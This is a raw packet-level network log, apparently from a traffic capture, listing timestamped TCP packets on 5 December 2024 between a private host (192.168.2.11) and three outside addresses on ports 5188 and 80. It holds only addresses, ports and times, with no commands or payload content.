Dec 5, 2024 17:32:14.667964935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.668334007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.668492079 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.668997049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.669032097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.669174910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.669966936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.670099974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.670160055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.671092987 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.671572924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.671756029 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.672313929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.672535896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.672605038 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.673458099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.673970938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.674144983 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.674464941 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.674748898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.674786091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.675698996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.676069975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.676219940 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.676767111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.676903009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.676964998 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.677995920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.686055899 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.686075926 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.704261065 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:14.728358984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.728415012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.728499889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.728548050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.728864908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.728910923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.728957891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.729126930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.730027914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.730081081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.730271101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.730315924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.731209993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.731264114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.731275082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.731369972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.732343912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.732393980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.732424021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.732465029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.733521938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.733561039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.733978033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.734096050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.734658957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.734699965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.734707117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.734743118 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.735790014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.735909939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.735915899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.735997915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.736974955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.737027884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.737518072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.737557888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.738120079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.738171101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.738296986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.738341093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.739275932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.739366055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.739372015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.739413977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.740425110 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.740556955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.740576982 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.740598917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.741626024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.741681099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.742074013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.742120028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.742827892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.742913008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.743000031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.743072987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.743922949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.743974924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.744044065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.744083881 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.745047092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.745098114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.745171070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.745213032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.746243954 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.746289015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.746465921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.746505976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.747343063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.747445107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.747489929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.747525930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.748518944 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.748565912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.748621941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.748698950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.749680042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.749735117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.749838114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.749881983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.750888109 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.750937939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.751180887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.751230955 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.752916098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.753096104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.753128052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.753144979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.753987074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.754038095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.754108906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.754151106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.755105972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.755148888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.755342007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.755383015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.756042004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.756093979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.756103992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.756145954 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.757004023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.757045984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.757277012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.757329941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.758019924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.758080006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.758270979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.758315086 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.759783983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.759830952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.759993076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.760044098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.760910988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.760965109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.761095047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.761217117 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.762412071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.762478113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.762643099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.762701988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.763324976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.763370991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.763407946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.763587952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.764169931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.764214039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.764278889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.764386892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.764950991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.764997959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.765027046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.765069008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.766086102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.766134977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.766164064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.766208887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.766982079 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.767038107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.767071009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.767167091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.768199921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.768246889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.768261909 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.768297911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.769330978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.769396067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.769442081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.770508051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.770528078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.770550013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.770564079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.771622896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.771764994 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.771768093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.771797895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.772751093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.772818089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.772859097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.773960114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.774106026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.774156094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.775065899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.775113106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.775204897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.775242090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.776223898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.776276112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.776458025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.776591063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.777328014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.777369976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.777596951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.777709961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.778557062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.778600931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.778647900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.778809071 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.779673100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.779732943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.779891968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.779942036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.780853033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.780899048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.780925989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.780950069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.781991005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.782044888 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.782222986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.782265902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.783149004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.783196926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.783205032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.783236980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.784308910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.784363985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.784501076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.784545898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.785494089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.785545111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.785970926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.786015034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.786607981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.786657095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.786680937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.786725998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.787756920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.787806988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.787887096 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.787933111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.788865089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.788911104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.810678005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.810787916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.810861111 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.811197042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.811422110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.811475039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.812320948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.812591076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.812690973 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.813466072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.813797951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.813868046 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.814577103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.815074921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.815114975 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.815752983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.815907001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.816026926 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.816879034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.816922903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.817142963 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.818007946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.818264008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.818377018 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.819135904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.819583893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.819657087 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.820444107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.821167946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.821214914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.821497917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.821512938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.821578026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.822545052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.823246956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.823400974 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.823683977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.824409008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.824457884 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.824851990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.824866056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.824925900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.825970888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.826191902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.826250076 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.827125072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.827467918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.827529907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.828234911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.828896999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.828938007 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.829377890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.830111980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.830163002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.830625057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.831001043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.831077099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.831700087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.831958055 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.832019091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.832849026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.833862066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.833992004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.834007025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.834037066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.834063053 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.835119009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.835498095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.835556030 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.836218119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.836294889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.836343050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.837376118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.838490009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.838563919 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.839268923 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.839353085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.839519024 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.839953899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.840145111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.840193033 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.840759039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.841262102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.841336966 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.841922998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.841936111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.841979980 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.843048096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.843276978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.843362093 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.844168901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.844265938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.844378948 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.845360994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.845496893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.845587969 CET	49792	5188	192.168.2.11	92.255.85.66
